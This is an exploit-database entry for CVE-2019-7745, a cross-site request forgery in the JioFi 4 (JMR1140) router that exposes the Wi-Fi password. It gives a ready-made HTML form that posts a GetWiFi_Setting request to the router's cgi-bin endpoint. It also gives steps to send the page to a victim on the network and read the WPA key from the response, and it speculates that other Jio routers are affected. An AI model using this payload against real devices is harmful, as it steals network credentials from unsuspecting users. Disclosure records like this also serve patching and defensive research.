Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure)

ID: 100994
CVE: None
Download vulnerable application: None
# Exploit Title: Jiofi 4 (JMR 1140) CSRF To View Wi-fi Password
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact:
# Vendor Homepage:
# Hardware Link:
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7745


JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain the Wi-Fi password by making a cgi-in/qcmap_web_cgi Page=GetWiFi_Setting request and then reading the wpa_security_key field.

1. Create a view.html and insert

  <script>history.pushState('', '', '/')</script>
    <form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
      <input type="hidden" name="Page" value="GetWiFi&#95;Setting" />
      <input type="hidden" name="Mask" value="0" />
      <input type="hidden" name="result" value="0" />
      <input type="submit" value="Submit request" />

2. Send to victim(who is connected to the wifi network).
3. The response gives the current wifi password.
  Example response-


Note- I believe this to work in all other jio routers viz. Jio JMR 540, Jiofi M2 as all share similar web interface. I have not confirmed this.
1-4-2 (www01)